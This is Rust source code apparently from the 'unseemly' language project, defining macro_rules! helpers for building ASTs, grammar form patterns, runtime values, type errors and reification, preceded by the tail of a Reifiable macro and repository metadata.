#[$($whatever:tt)*] $($contents:tt)* } $( [ $( $accum:tt )* ] )* ) => { Reifiable!((remove_p_and_a) struct $name$(<$($ty_param),*>)* @ $(<$($ty_param_ty),*>)* { $( $contents )* } $( [ $($accum)* ] )*); }; // no `pub` or attr this time ((remove_p_and_a) $(pub)* struct $name:ident $(<$($ty_param:tt),*>)* @ $(<$($ty_param_ty:ident),*>)* { $field_car:ident : $t_car:ty, $($cdr:tt)* } $( [ $( $accum:tt )* ] )* ) => { Reifiable!((remove_p_and_a) struct $name$(<$($ty_param),*>)* @ $(<$($ty_param_ty),*>)* { $( $cdr )* } [ $field_car : $t_car $(, $($accum)* )* ]); }; ((make_impl) struct $name:ident $(<$($ty_param:tt),*>)* @ $(<$($ty_param_ty:ident),*>)* { $( $field:ident : $t:ty),* }) => { impl<'t $($(, $ty_param_ty : crate::runtime::reify::Reifiable)*)*> crate::runtime::reify::Reifiable for $name<$($($ty_param),*)*> { fn ty() -> crate::ast::Ast { type_defn_wrapper!($(<$($ty_param_ty),*>)* => { "Type" "struct" : "component_name" => [@"c" $( (at stringify!($field)) ),* ], "component" => // TODO: unless we specify arguments with the same name as parameters, // we get bogus results // (we get // ∀ K V. μ Assoc. struct{ n: Option<AssocNode<ident rust_usize>> } // rather than // ∀ K V. μ Assoc. struct{ n: Option<AssocNode<K V>> } [@"c" $( (, <$t as crate::runtime::reify::Reifiable>::ty_invocation() ) ),*] }) } fn ty_name() -> crate::name::Name { crate::name::n(stringify!($name)) } fn concrete_arguments() -> Option<Vec<crate::ast::Ast>> { // HACK: at runtime, check to see if we need type parameters by making a vector let argument_list : Vec<&str> = vec![$( $( stringify!($ty_param_ty) ),* )*]; if argument_list.len() > 0 { Some(vec![ $( $( <$ty_param_ty>::ty_invocation() ),* )* ]) } else { None } } fn reify(&self) -> crate::runtime::eval::Value { crate::runtime::eval::Struct(assoc_n!( $( (stringify!($field)) => self.$field.reify()),* )) } #[allow(unused_variables)] fn reflect(v: &crate::runtime::eval::Value) -> Self { extract!((v) crate::runtime::eval::Struct = (ref env) => $name { $( $field : <$t as crate::runtime::reify::Reifiable>::reflect( env.find(&crate::name::n(stringify!($field))).unwrap())),* }) } } }; /* enum */ // `lifetime` means that we need to pull off a lifetime argument. // The whole set of type parameters comes after `name`; // we make a just-the-types type parameters after the @. ((lifetime) $(#[$($whatever:tt)*])* $(pub)* enum $name:ident<$lifetime:tt> { $( $contents:tt )* }) => { Reifiable!((remove_attr) enum $name<$lifetime> @ { $( $contents )* , }); }; ((lifetime) $(#[$($whatever:tt)*])* $(pub)* enum $name:ident<$lifetime:tt $(, $ty_param_ty:ident)*> { $( $contents:tt )* }) => { Reifiable!((remove_attr) enum $name<$lifetime $(, $ty_param_ty)*> @ <$($ty_param_ty),*> { $( $contents )* , }); }; (() $(#[$($whatever:tt)*])* $(pub)* enum $name:ident$(<$($ty_param_ty:ident),*>)* { $( $contents:tt )* }) => { Reifiable!((remove_attr) enum $name$(<$($ty_param_ty),*>)* @ $(<$($ty_param_ty),*>),* { $( $contents )* , }); }; // done! (has to go first) ((remove_attr) enum $name:ident$(<$($ty_param:tt),*>)* @ $(<$($ty_param_ty:ident),*>)* { $(,)* } $([ $($accum:tt)* ])*) => { Reifiable!((make_impl) enum $name$(<$($ty_param),*>)* @ $(<$($ty_param_ty),*>)* { $($( $accum )*)* } ); }; // drop the attribute ((remove_attr) enum $name:ident$(<$($ty_param:tt),*>)* @ $(<$($ty_param_ty:ident),*>)* { #[ $($whatever:tt)* ] $( $contents:tt )* } $([ $($accum:tt)* ])* ) => { Reifiable!((remove_attr) enum $name$(<$($ty_param),*>)* @ $(<$($ty_param_ty),*>)* { $( $contents )* } $([ $($accum)* ])* ); }; // no attribute this time ((remove_attr) enum $name:ident$(<$($ty_param:tt),*>)* @ $(<$($ty_param_ty:ident),*>)* { $choice:ident$(( $($part:ty),* ))*, $( $contents:tt )* } $([ $($accum:tt)* ])*) => { Reifiable!((remove_attr) enum $name$(<$($ty_param),*>)* @ $(<$($ty_param_ty),*>)* { $( $contents )* } [ $choice $(( $($part),* ))* , $($($accum)*)* ]); }; // The `$((...))*` and `$(<...>)*` patterns deal with the fact that the `()` and `<>` // might be completely absent (the `*` matches 0 or 1 times) // The second set of type parameters are those that are not lifetime params... ((make_impl) enum $name:ident$(<$($ty_param:tt),*>)* @ $(<$($ty_param_ty:ident),*>)* { $($choice:ident$(( $($part:ty),* ))* ,)* }) => { impl<'t $($(, $ty_param_ty : crate::runtime::reify::Reifiable)*)*> crate::runtime::reify::Reifiable for $name<$($($ty_param),*)*> { fn ty() -> crate::ast::Ast { type_defn_wrapper!($(<$($ty_param_ty),*>)* => { "Type" "enum" : "name" => [@"c" $( (at (stringify!($choice))) ),* ], "component" => [@"c" $( [ $($( (, <$part as crate::runtime::reify::Reifiable>::ty_invocation() ) ),*)*]),*] }) } fn ty_name() -> crate::name::Name { crate::name::n(stringify!($name)) } fn concrete_arguments() -> Option<Vec<crate::ast::Ast>> { // HACK: at runtime, check to see if we need type parameters by making a vector let argument_list : Vec<&str> = vec![$( $( stringify!($ty_param_ty) ),* )*]; if argument_list.len() > 0 { Some(vec![ $( $( <$ty_param_ty>::ty_invocation() ),* )* ]) } else { None } } #[allow(unused_mut)] // rustc bug! `v` has to be mutable, but it complains fn reify(&self) -> crate::runtime::eval::Value { match *self { $( choice_pat!( ( $($($part),*)* ) (a b c d e f g h i j k l m n o p q r s t) $name::$choice ; ()) => { let mut v = vec![]; choice_vec!( ( $($($part),*)* ) (a b c d e f g h i j k l m n o p q r s t) v); crate::runtime::eval::Value::Enum(crate::name::n(stringify!($choice)), v) } ),* } } #[allow(unused_variables)] fn reflect(v: &crate::runtime::eval::Value) -> Self { extract!((v) crate::runtime::eval::Enum = (ref choice, ref parts) => { make_enum_reflect!(choice; parts; $name$(<$($ty_param),*>)*/**/ { $($choice $(( $($part),* ))*),* } ) }) } } } } // makes a pattern matching an enum with _n_ components, using the first _n_ // of the input names (be sure to supply enough names!) macro_rules! choice_pat { ( ($t_car:ty $(, $t_cdr:ty)* ) ($i_car:ident $($i_cdr:ident)*) $choice:path; ($($accum:ident),*)) => { choice_pat!( ($($t_cdr),* ) ($($i_cdr)*) $choice; ($i_car $(, $accum)*)) }; ( ( ) ($($i_cdr:ident)*) $choice:path; ( ) ) => { $choice }; ( ( ) ($($i_cdr:ident)*) $choice:path; ( $($accum:ident),+ ) ) => { $choice($(ref $accum),*) }; } macro_rules! choice_vec { /* the types are ignored, except for how many of them there are */ ( ($t_car:ty $(, $t_cdr:ty)*) ($i_car:ident $($i_cdr:ident)*) $v:expr) => { { choice_vec!( ($($t_cdr),*) ($($i_cdr)*) $v); $v.push($i_car.reify()); } }; ( ( ) ($($i_cdr:ident)*) $v:expr) => { {} } } // workaround for MBE limitation; need to walk choices, but *not* ty_param, // so we use this to manually walk over the choices macro_rules! make_enum_reflect { ($choice_name:ident; $parts_name:ident; $name:ident$(<$($ty_param:tt),*>)*/**/ { $choice_car:ident $(( $($part_cars:ty),* ))* $(, $choice_cdr:ident$(( $($part_cdr:ty),* ))*)* }) => { if $choice_name.is(stringify!($choice_car)) { unpack_parts!( $(( $($part_cars),* ))* $parts_name; 0; $name::$choice_car$(::< $($ty_param),* >)*; ()) } else { make_enum_reflect!($choice_name; $parts_name; $name$(<$($ty_param),*>)*/**/ { $($choice_cdr $(( $($part_cdr),* ))* ),* }) } }; ($choice_name:ident; $parts_name:ident; $name:ident$(<$($ty_param:tt),*>)*/**/ { } ) => { icp!("invalid enum choice: {:#?}", $choice_name) } } macro_rules! unpack_parts { ( ($t_car:ty $(, $t_cdr:ty)*) $v:expr; $idx:expr; $ctor:expr; ($($accum:expr),*)) => { unpack_parts!( ( $($t_cdr),* ) $v; ($idx + 1); $ctor; ($($accum, )* <$t_car as crate::runtime::reify::Reifiable>::reflect(& $v[$idx]))) }; ( () $v:expr; $idx:expr; $ctor:expr; ($($accum:expr),*)) => { $ctor($($accum),*) }; ( $v:expr; $idx:expr; $ctor:expr; ()) => { $ctor // special case: a value, not a 0-arg constructor } } // For `ty` macro_rules! type_defn_wrapper { ( $(<$($ty_param_ty:ident),*>)* => $body:tt ) => {{ // In this context, we want reification of the type parameters // to produce type variables, not whatever those parameters "actually" are // (because they're actually `Irr`, since they are irrelevant). $( $( struct $ty_param_ty {} impl crate::runtime::reify::Reifiable for $ty_param_ty { fn ty_name() -> crate::name::Name { crate::name::n(stringify!($ty_param_ty)) } fn reify(&self) -> crate::runtime::eval::Value { icp!() } fn reflect(_: &crate::runtime::eval::Value) -> Self { icp!() } } )* )* // All types will be ∀, even if in Rust they have no parameters; // this is safe, but a nuisance. // All types will be μ. I think this is the way things work in most languages. ast!({"Type" "forall_type" : "param" => [ $($( (at stringify!($ty_param_ty))),*)*], "body" => (import [* [forall "param"]] {"Type" "mu_type" : "param" => [(import [prot "param"] (vr Self::ty_name()))], "body" => (import [* [prot "param"]] $body) }) }) }} } macro_rules! refer_to_type { ($name:tt < $( $arg:ty ),* >) => { ast!({ "Type" "type_apply" : "type_rator" => (, ::ast::Ast::VariableReference(::name::n(stringify!($name))) ), "arg" => [ (, $( refer_to_type!($arg)),* )] }) }; ($name:tt) => { ::ast::Ast::VariableReference(::name::n(stringify!($name))) } }
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
false
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/macros/macros.rs
src/macros/macros.rs
#![macro_use] // TODO: use a real logging framework macro_rules! log { ($($e:expr),*) => { // print!( $($e),* ); }; } macro_rules! icp { () => { panic!("ICP: can't happen") }; ( $($arg:expr),* ) => { panic!("ICP: {}", format!( $($arg),* ) ) }; } // Assoc macro_rules! expr_ify { ($e:expr) => { $e }; } macro_rules! assoc_n { () => { crate::util::assoc::Assoc::new() }; ( $k:tt => $v:expr $(, $k_cdr:tt => $v_cdr:expr)* ) => { assoc_n!( $( $k_cdr => $v_cdr ),* ).set(crate::name::n(expr_ify!($k)), $v) }; ( ($k:expr) => $v:expr $(, $k_cdr:tt => $v_cdr:expr)* ) => { assoc_n!( $( $k_cdr => $v_cdr ),* ).set(::name::n($k), $v) }; } // Beta macro_rules! beta_connector { ($lhs:tt : $rhs:tt) => { crate::beta::Basic(crate::name::n(expr_ify!($lhs)), crate::name::n(expr_ify!($rhs))) }; ($lhs:tt = $rhs:tt) => { crate::beta::SameAs( crate::name::n(expr_ify!($lhs)), Box::new(raw_ast!(VariableReference(crate::name::n(expr_ify!($rhs))))), ) }; // TODO: this needs a better notation, somehow ($lhs:tt == $rhs:tt) => { crate::beta::SameAs(crate::name::n(expr_ify!($lhs)), Box::new(ast!($rhs))) }; ($lhs:tt += $rhs:tt) => { crate::beta::SameAs(crate::name::n(expr_ify!($lhs)), Box::new(u!($rhs))) }; } macro_rules! beta { ( [] ) => { crate::beta::Nothing }; ( [* $body:tt ]) => { { let sub = beta!($body); let drivers = sub.names_mentioned(); crate::beta::ShadowAll(Box::new(sub), drivers) } }; ( [ forall $name:tt $( $rest:tt )*] ) => { crate::beta::Shadow(Box::new( crate::beta::Underspecified( crate::name::n(expr_ify!($name)))), Box::new(beta!( [ $( $rest )* ] ))) }; ( [ prot $name:tt $( $rest:tt )*] ) => { crate::beta::Shadow(Box::new( crate::beta::Protected( crate::name::n(expr_ify!($name)))), Box::new(beta!( [ $( $rest )* ] ))) }; ( [ unusable $name:tt $( $rest:tt )*] ) => { crate::beta::Shadow(Box::new( crate::beta::BoundButNotUsable(crate::name::n(expr_ify!($name)))), Box::new(beta!( [ $( $rest )* ] ))) }; // Just makes things prettier by not ending everything in " ▷ ∅": ( [ $name:tt $connector:tt $t:tt ] ) => { beta_connector!($name $connector $t) }; ( [ $name:tt $connector:tt $t:tt $( $rest:tt )* ] ) => { crate::beta::Shadow(Box::new(beta_connector!($name $connector $t)), Box::new(beta!( [ $( $rest )* ] ))) }; } macro_rules! ebeta { ( [] ) => { crate::beta::ExportBeta::Nothing }; ( [* $body:tt ]) => { { let sub = ebeta!($body); let drivers = sub.names_mentioned(); crate::beta::ExportBeta::ShadowAll(Box::new(sub), drivers) } }; ( [ $name:tt $( $rest:tt )*] ) => { crate::beta::ExportBeta::Shadow(Box::new(crate::beta::ExportBeta::Use(crate::name::n(expr_ify!($name)))), Box::new(ebeta!( [ $( $rest )* ] ))) }; } // Read macro_rules! tokens_s { () => { "" }; ($($contents:tt)*) => { &vec![ $( $contents ),* ].join(" ") } } macro_rules! t_elt { ( [ $e:expr ; $( $list:tt )* ] ) => { { let mut toks = vec![::name::n(concat!($e,"["))]; toks.append(&mut tokens!($($list)*).t); toks.push(::name::n(concat!("]", $e))); toks } }; ( { $e:expr ; $( $list:tt )* } ) => { { let mut toks = vec![::name::n(concat!($e,"{"))]; toks.append(&mut tokens!($($list)*).t); toks.push(::name::n(concat!("}", $e))); toks } }; ( ( $e:expr ; $( $list:tt )* ) ) => { { let mut toks = vec![::name::n(concat!($e,"("))]; toks.append(&mut tokens!($($list)*).t); toks.push(::name::n(concat!(")", $e))); toks } }; ($e:expr) => { vec![::name::n(& $e.replace(" ", "_"))] } } // Ast // AstContents to Ast. // Whenever possible, use `ast!` directly (or, in tests, `u!`). macro_rules! raw_ast { ($ast_kind:ident) => { crate::ast::Ast(std::rc::Rc::new(crate::ast::LocatedAst { c: crate::ast::AstContents::$ast_kind, // TODO: would Rust file info be useful? file_id: 0, begin: 0, end: 0 })) }; ($ast_kind:ident ( $( $body:expr ),* ) ) => { crate::ast::Ast(std::rc::Rc::new(crate::ast::LocatedAst { c: crate::ast::AstContents::$ast_kind( $( $body ),* ), // TODO: would Rust file info be useful? file_id: 0, begin: 0, end: 0 })) } } macro_rules! ast_shape { ($($contents:tt)*) => { raw_ast!(Shape(vec![ $( ast!($contents) ),* ] ))}; } macro_rules! ast { ( (trivial) ) => { raw_ast!(Trivial) }; ( (++ $pos:tt $sub:tt) ) => { raw_ast!(QuoteMore(ast!($sub), $pos)) }; ( (-- $depth:tt $sub:tt ) ) => { raw_ast!(QuoteLess(ast!($sub), $depth)) }; ( (import $beta:tt $sub:tt) ) => { raw_ast!(ExtendEnv(ast!($sub), beta!($beta))) }; ( (import_phaseless $beta:tt $sub:tt) ) => { raw_ast!(ExtendEnvPhaseless(ast!($sub), beta!($beta))) }; /* // not sure we'll need this ( (* $env:expr => $new_env:ident / $($n:expr),* ; $($sub_ar"gs:tt)*) ) => { { let mut res = vec![]; for $new_env in $env.march_all( &vec![$($n),*] ) { res.push(ast!($sub)) } res.reverse(); Shape(res) } };*/ ( (vr $var:expr) ) => { raw_ast!(VariableReference(crate::name::Name::from($var))) }; // Like the last clause, but explicit about being an atom: ( (at $var:expr) ) => { raw_ast!(Atom(crate::name::Name::from($var))) }; ( (, $interpolate:expr)) => { $interpolate }; // TODO: maybe we should use commas for consistency: ( ( $( $list:tt )* ) ) => { ast_shape!( $($list)* ) }; ( { - $($mbe_arg:tt)* } ) => { raw_ast!(IncompleteNode(mbe!( $($mbe_arg)* ))) }; ( { $nt:tt $form:tt => $beta:tt : $($mbe_arg:tt)*} ) => { raw_ast!(Node(crate::core_forms::find($nt, $form), mbe!( $($mbe_arg)* ), ebeta!($beta))) }; ( { $form:expr => $beta:tt ; $($mbe_arg:tt)*} ) => { raw_ast!(Node($form, mbe!( $($mbe_arg)* ), ebeta!($beta))) }; ( { $form:expr; [ $($mbe_arg:tt)* ] }) => { ast!( { $form ; $($mbe_arg)* } ) }; ( { $form:expr; $($mbe_arg:tt)* }) => { raw_ast!(Node($form, mbe!( $($mbe_arg)* ), crate::beta::ExportBeta::Nothing)) }; ( { $nt:tt $form:tt : $($mbe_arg:tt)* }) => { raw_ast!(Node(crate::core_forms::find($nt, $form), mbe!( $($mbe_arg)* ), crate::beta::ExportBeta::Nothing)) }; // Accepts either `&str` (most common) or `Names`: ($e:expr) => { raw_ast!(Atom(crate::name::Name::from($e))) }; } // These construct spanned type errors (so, for type synthesis, not subtyping) macro_rules! ty_err_val { ( $name:tt ( $($arg:expr),* ) at $loc:expr) => { crate::util::err::sp(crate::ty::TyErr::$name( $($arg),* ), $loc.clone()) } } macro_rules! ty_err { ( $name:tt ( $($arg:expr),* ) at $loc:expr) => { return Err(ty_err_val!( $name ( $($arg),* ) at $loc)) } } macro_rules! ty_exp { // type expectation ( $got:expr, $expected:expr, $loc:expr) => { if $got != $expected { ty_err!(Mismatch((*$got).clone(), (*$expected).clone()) at $loc) } } } macro_rules! ty_err_p { // type error pattern ( $name:tt ( $($arg:pat),* ) ) => { Err( crate::util::err::Spanned { body: crate::ty::TyErr::$name( $($arg),* ), loc: _ } ) } } // EnvMBE // These macros generate `EnvMBE<Ast>`s, not arbitrary `EnvMBE`s, // which is a little un-abstract, but is the main usage. // Wait a second, I'm writing in Rust right now! I'll use an MBE macro to implement an MBE literal! macro_rules! mbe_one_name { // `elt` ought to have an interpolation that references `new_env` // TODO: maybe this (and the parser!) ought to add 0-times-repeated leaves to `leaf_locations` /* TYPE PUN ALERT: $env has to be something with a `march_all` method; there's no trait enforcing this. But wait, isn't preventing this kind of nonsense the whole point of this project? Well, you know the old saying: "While the mice are implementing the cat, the mice will play." */ ($k:tt => [* $env:expr =>($($n:expr),*) $new_env:ident : $elt:tt]) => { { let mut v = vec![]; let marchee = vec![$(crate::name::n($n)),*]; for $new_env in $env.march_all(&marchee) { v.push( mbe_one_name!($k => $elt)); } crate::util::mbe::EnvMBE::new_from_anon_repeat(v) } }; // HACK: `new_from_{named,anon}_repeat` don't work if the repeat is empty! ($k:tt => [@ $n:tt ]) => { crate::util::mbe::EnvMBE::<crate::ast::Ast>::new_from_empty_named_repeat( crate::name::n(expr_ify!($n)), &vec![crate::name::n(expr_ify!($k))] ) }; ($k:tt => []) => { crate::util::mbe::EnvMBE::<crate::ast::Ast>::new_from_empty_anon_repeat( &vec![crate::name::n(expr_ify!($k))] ) }; ($k:tt => [@ $n:tt $($elt:tt),+]) => { crate::util::mbe::EnvMBE::new_from_named_repeat( crate::name::n(expr_ify!($n)), vec![ $( mbe_one_name!($k => $elt) ),* ] ) }; ($k:tt => [$($elt:tt),+]) => { crate::util::mbe::EnvMBE::new_from_anon_repeat( vec![ $( mbe_one_name!($k => $elt) ),* ]) }; // since `Ast`s go on the RHS, we have to have a distinctive interpolation syntax ($k:tt => (,seq $e:expr)) => { { let seq_expr = $e; if (seq_expr.is_empty()) { crate::util::mbe::EnvMBE::new_from_empty_anon_repeat(&[crate::name::n(expr_ify!($k))]) } else { let mut v = vec![]; for elt in seq_expr { v.push(crate::util::mbe::EnvMBE::new_from_leaves(assoc_n!($k => elt))) } crate::util::mbe::EnvMBE::new_from_anon_repeat(v) } } }; ($k:tt => (@ $rep_n:tt ,seq $e:expr)) => { { let seq_expr = $e; if (seq_expr.is_empty()) { crate::util::mbe::EnvMBE::new_from_empty_named_repeat( crate::name::n(expr_ify!($rep_n)), &[crate::name::n(expr_ify!($k))]) } else { let mut v = vec![]; for elt in seq_expr { v.push(crate::util::mbe::EnvMBE::new_from_leaves(assoc_n!($k => elt))) } crate::util::mbe::EnvMBE::new_from_named_repeat(crate::name::n(expr_ify!($rep_n)), v) } } }; // For parsing reasons, we only accept expressions that are TTs. // It's hard to generalize the `mbe!` interface so that it accepts exprs // or `[]`-surrounded trees of them. ($k:tt => $leaf:tt) => { crate::util::mbe::EnvMBE::new_from_leaves(assoc_n!($k => ast!($leaf))) } } // Eventually, this ought to support more complex structures macro_rules! mbe { ( $( $lhs:tt => $rhs:tt ),* ) => {{ let single_name_mbes = vec![ $( mbe_one_name!($lhs => $rhs) ),*]; let mut res = crate::util::mbe::EnvMBE::new(); for m in &single_name_mbes { res = res.merge(m); } res }} } // FormPat // TODO #8: `ast!` and `form_pat!` are inconsistent with each other. macro_rules! form_pat { ((lit $e:expr)) => { crate::grammar::FormPat::Literal( std::rc::Rc::new(crate::grammar::FormPat::Call(crate::name::n("DefaultToken"))), crate::name::n($e)) }; ((name_lit $e:expr)) => { crate::grammar::FormPat::Literal( std::rc::Rc::new(crate::grammar::FormPat::Call(crate::name::n("DefaultWord"))), crate::name::n($e)) }; ((lit_aat $e:expr)) => { crate::grammar::FormPat::Literal( std::rc::Rc::new(crate::grammar::new_scan(r"\s*(\S+)", None)), crate::name::n($e)) }; ((name_lit__by_name $e:expr)) => { crate::grammar::FormPat::Literal( std::rc::Rc::new(crate::grammar::FormPat::Call(crate::name::n("DefaultWord"))), $e) }; ((lit_tok $tok:tt, $lit:expr)) => { crate::grammar::FormPat::Literal( std::rc::Rc::new(form_pat!($tok)), crate::name::n($lit)) }; ((scan_cat $e:expr, $cat:expr)) => { crate::grammar::new_scan($e, Some(String::from($cat))) }; ((scan $e:expr)) => { crate::grammar::new_scan($e, None) }; ((reserved $body:tt, $( $res:tt )*)) => { crate::grammar::FormPat::Reserved(std::rc::Rc::new(form_pat!($body)), vec![$( n($res) ),*]) }; ((reserved_by_name_vec $body:tt, $names:expr)) => { crate::grammar::FormPat::Reserved(std::rc::Rc::new(form_pat!($body)), $names) }; ((common $body:tt)) => { crate::grammar::FormPat::Common(std::rc::Rc::new(form_pat!($body))) }; ((anyways $a:tt)) => { crate::grammar::FormPat::Anyways(ast!($a)) }; ((impossible)) => { crate::grammar::FormPat::Impossible }; (atom) => { crate::grammar::FormPat::Call(crate::name::n("AtomNotInPat")) }; (varref) => { crate::grammar::FormPat::VarRef( std::rc::Rc::new(crate::grammar::FormPat::Call(crate::name::n("DefaultAtom"))) ) }; ((varref_call $n:tt)) => { crate::grammar::FormPat::VarRef( std::rc::Rc::new(crate::grammar::FormPat::Call(crate::name::n($n))) ) }; (varref_aat) => { crate::grammar::FormPat::VarRef( std::rc::Rc::new(crate::grammar::new_scan(r"\s*(\S+)", None)) ) }; ((delim $n:expr, $d:expr, $body:tt)) => { crate::grammar::FormPat::Seq(vec![ std::rc::Rc::new(crate::grammar::FormPat::Literal( std::rc::Rc::new(crate::grammar::FormPat::Call(crate::name::n("OpenDelim"))), crate::name::n($n))), std::rc::Rc::new(form_pat!($body)), { let mut main_tok = $n.to_owned(); main_tok.pop(); std::rc::Rc::new(crate::grammar::FormPat::Literal( std::rc::Rc::new(crate::grammar::FormPat::Call(crate::name::n("CloseDelim"))), crate::name::n(&format!("{}{}", crate::read::delim($d).close(), main_tok)))) }]) }; ((star $body:tt)) => { crate::grammar::FormPat::Star(std::rc::Rc::new(form_pat!($body))) }; ((plus $body:tt)) => { crate::grammar::FormPat::Plus(std::rc::Rc::new(form_pat!($body))) }; ((alt $($body:tt),* )) => { crate::grammar::FormPat::Alt(vec![ $( std::rc::Rc::new(form_pat!($body)) ),* ] )}; ((biased $lhs:tt, $rhs:tt)) => { crate::grammar::FormPat::Biased(std::rc::Rc::new(form_pat!($lhs)), std::rc::Rc::new(form_pat!($rhs))) }; ((call $n:expr)) => { crate::grammar::FormPat::Call(crate::name::n($n)) }; ((call_by_name $n:expr)) => { crate::grammar::FormPat::Call($n) }; ((scope $f:expr)) => { crate::grammar::FormPat::Scope($f, crate::beta::ExportBeta::Nothing) }; ((scope $f:expr, $ebeta:tt)) => { crate::grammar::FormPat::Scope($f, ebeta!($ebeta)) }; ((pick $body:tt, $n:expr)) => { crate::grammar::FormPat::Pick(std::rc::Rc::new(form_pat!($body)), crate::name::n($n)) }; ((named $n:expr, $body:tt)) => { crate::grammar::FormPat::Named(crate::name::n($n), std::rc::Rc::new(form_pat!($body))) }; ((import $beta:tt, $body:tt)) => { crate::grammar::FormPat::NameImport(std::rc::Rc::new(form_pat!($body)), beta!($beta)) }; ((import_phaseless $beta:tt, $body:tt)) => { crate::grammar::FormPat::NameImportPhaseless( std::rc::Rc::new(form_pat!($body)), beta!($beta)) }; ((++ $pos:tt $body:tt)) => { // `pos` should be an expr, but I didn't want a comma. Name it. crate::grammar::FormPat::QuoteDeepen(std::rc::Rc::new(form_pat!($body)), $pos) }; ((-- $depth:tt $body:tt)) => { crate::grammar::FormPat::QuoteEscape(std::rc::Rc::new(form_pat!($body)), $depth) }; ((extend_nt $lhs:tt, $n:expr, $f:expr)) => { crate::grammar::FormPat::SynImport( std::rc::Rc::new(form_pat!($lhs)), std::rc::Rc::new(crate::grammar::FormPat::Call(crate::name::n($n))), crate::grammar::SyntaxExtension(std::rc::Rc::new(Box::new($f)))) }; ((extend $lhs:tt, $body:tt, $f:expr)) => { crate::grammar::FormPat::SynImport( std::rc::Rc::new(form_pat!($lhs)), std::rc::Rc::new(form_pat!($body)), crate::grammar::SyntaxExtension(std::rc::Rc::new(Box::new($f)))) }; ( [$($body:tt),*] ) => { crate::grammar::FormPat::Seq(vec![ $( std::rc::Rc::new(form_pat!($body)) ),* ])}; ((, $interpolate:expr)) => { $interpolate } } macro_rules! syn_env { () => { crate::util::assoc::Assoc::new() }; ( $k:tt => $rhs:tt $(, $k_cdr:tt => $rhs_cdr:tt)* ) => { syn_env!( $( $k_cdr => $rhs_cdr ),* ) .set(crate::name::n(expr_ify!($k)), Rc::new(form_pat!($rhs))) }; } // Utility for constructing `Custom` walks // Seems impossible to make this a function, for lifetime/sizedness reasons. macro_rules! cust_rc_box { ($contents:expr) => { crate::ast_walk::WalkRule::Custom(std::rc::Rc::new(Box::new($contents))) }; } // Form definitions macro_rules! basic_typed_form { ( $p:tt, $gen_type:expr, $eval:expr ) => { Rc::new(crate::form::Form { name: crate::name::n("unnamed form"), grammar: Rc::new(form_pat!($p)), type_compare: crate::form::Positive(crate::ast_walk::WalkRule::NotWalked), synth_type: crate::form::Positive($gen_type), quasiquote: crate::form::Both( crate::ast_walk::WalkRule::LiteralLike, crate::ast_walk::WalkRule::LiteralLike, ), eval: crate::form::Positive($eval), }) }; } macro_rules! typed_form { ( $name:expr, $p:tt, $gen_type:expr, $eval:expr ) => { Rc::new(crate::form::Form { name: crate::name::n($name), grammar: Rc::new(form_pat!($p)), type_compare: crate::form::Positive(crate::ast_walk::WalkRule::NotWalked), synth_type: crate::form::Positive($gen_type), quasiquote: crate::form::Both( crate::ast_walk::WalkRule::LiteralLike, crate::ast_walk::WalkRule::LiteralLike, ), eval: crate::form::Positive($eval), }) }; } macro_rules! negative_typed_form { ( $name:expr, $p:tt, $gen_type:expr, $eval:expr ) => { Rc::new(crate::form::Form { name: crate::name::n($name), grammar: Rc::new(form_pat!($p)), type_compare: crate::form::Positive(crate::ast_walk::WalkRule::NotWalked), synth_type: crate::form::Negative($gen_type), quasiquote: crate::form::Both( crate::ast_walk::WalkRule::LiteralLike, crate::ast_walk::WalkRule::LiteralLike, ), eval: crate::form::Negative($eval), }) }; } // Value // (This is exported so `cli.rs` can use it. TODO: bring those tests back into the library.) #[macro_export] macro_rules! val { (i $i:expr) => { crate::runtime::eval::Value::Int(::num::bigint::BigInt::from($i)) }; (b $b:expr) => { crate::runtime::eval::Value::Enum( crate::name::n(if $b {"True"} else {"False"}), vec![]) }; (s $s:expr) => { crate::runtime::eval::Value::Text( String::from($s) ) }; (f $body:tt, $params:expr, $env:tt) => { crate::runtime::eval::Value::Function( std::rc::Rc::new(::runtime::eval::Closure(ast!($body), $params, assoc_n! $env))) }; (bif $f:expr) => { crate::runtime::eval::Value::BuiltInFunction(::runtime::eval::BIF(std::rc::Rc::new($f))) }; (ast $body:tt) => { crate::runtime::eval::Value::AbstractSyntax(ast!($body)) }; (struct $( $k:tt => $v:tt ),* ) => { crate::runtime::eval::Value::Struct(assoc_n!( $( $k => val! $v),* )) }; (enum $nm:expr, $($v:tt),*) => { crate::runtime::eval::Value::Enum(crate::name::n($nm), vec![ $( val! $v ),* ]) }; (seq $($v:tt)*) => { crate::runtime::eval::Value::Sequence(vec![ $( std::rc::Rc::new(val! $v) ),* ]) }; (cell $v:tt) => { crate::runtime::eval::Value::Cell(std::rc::Rc::new(std::cell::RefCell::new(val! $v) )) }; (, $interpolate:expr) => { $interpolate } } // core_values stuff macro_rules! mk_type { // TODO: maybe now use find_core_form and un-thread $se? ( [ ( $( $param:tt ),* ) -> $ret_t:tt ] ) => { ast!( { crate::core_forms::find_core_form("Type", "fn") ; "param" => [ $((, mk_type!($param) )),*], "ret" => (, mk_type!($ret_t)) }) }; ( $n:tt ) => { ast!({ "Type" $n : }) }; // atomic type } // Define a typed function macro_rules! tf { ( [ ( $($param_t:tt),* ) -> $ret_t:tt ] , ( $($param_p:pat),* ) => $body:expr) => { TypedValue { ty: mk_type!([ ( $($param_t),* ) -> $ret_t ] ), val: core_fn!( $($param_p),* => $body ) } }; ( $n:tt, $e:expr ) => { TypedValue { ty: mk_type!( $n ), val: $e } } } // Like `tf!`, but actually uses `ast!`, which is more flexible than `mk_type!` macro_rules! tyf { ( $t:tt, ( $($param_p:pat),* ) => $body:expr ) => { TypedValue { ty: ast!($t), val: core_fn!($($param_p),* => $body) } } } macro_rules! bind_patterns { ( $iter:expr; () => $body:expr ) => { $body }; ( $iter:expr; ($p_car:pat, $($p_cdr:pat,)* ) => $body:expr ) => { #[allow(unreachable_patterns)] // in case `$p_car` is irrefutable match $iter.next() { Some($p_car) => { bind_patterns!($iter; ($( $p_cdr, )*) => $body) } None => { icp!("too few arguments"); } Some(ref other) => { icp!("[type error] in argument: {:#?}", other); } } } } macro_rules! core_fn { ( $($p:pat),* => $body:expr ) => { BuiltInFunction(BIF(Rc::new( move | args | { let mut argi = args.into_iter(); bind_patterns!(argi; ($( $p, )*) => $body ) } ))) } } // Alpha #[macro_export] macro_rules! without_freshening { ($( $body:tt )*) => {{ let mut orig: bool = false; crate::alpha::freshening_enabled.with(|f| { orig = *f.borrow(); *f.borrow_mut() = false; }); { $( $body )* } 